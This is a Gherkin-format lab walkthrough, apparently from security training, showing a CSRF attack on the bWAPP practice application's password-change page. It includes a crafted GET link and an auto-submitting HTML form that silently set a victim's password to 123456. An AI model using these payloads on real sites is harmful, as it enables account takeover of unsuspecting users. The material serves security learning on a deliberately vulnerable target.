# language: en

Feature: CSRF (Change Password)
  From the bWAPP system
  Of the category A8: Cross-Site Request Forgery
  With low security level
  As the registered user disassembly

  Background:
    Given I'm running macOS High Sierra 10.13.6 (17G65)
    And using Docker version 17.07.0-ce, build 8784753
    And also using Safari Version 11.1.2 (13605.3.8)
    Given the following scenario
    """
    URN: /csrf_1.php
    Message: CSRF (Change Password)
    Details:
      - A password field to set the new password
      - Another password field to confirm the previous one
    Objective: Exploit the CSRF to change the password
    """

  Scenario: Simulate a GET CSRF attack to an end user
    When I test the functionality with my own password
    Then the request it's sent in plain text through the URL
    Given I copy and change the URN to match whatever I want
    """
    ?password_new=123456&password_conf=123456&action=change
    """
    And I sent this link to a the victim when hes log in on the website
    Then the password is changed from his current to the one (123456)

  Scenario: Simple method to exploit CSRF through POST
    Given I make an HTML document with the following code
    """
    <body onload="document.forms[0].submit()">
      <form method="POST" action="http://192.168.99.100/csrf_1.php?
                    password_new=123456&
                    password_conf=123456&
                    action=change" />
    </body>
    """
    Then I can sent the link and the form will automatically will be posted
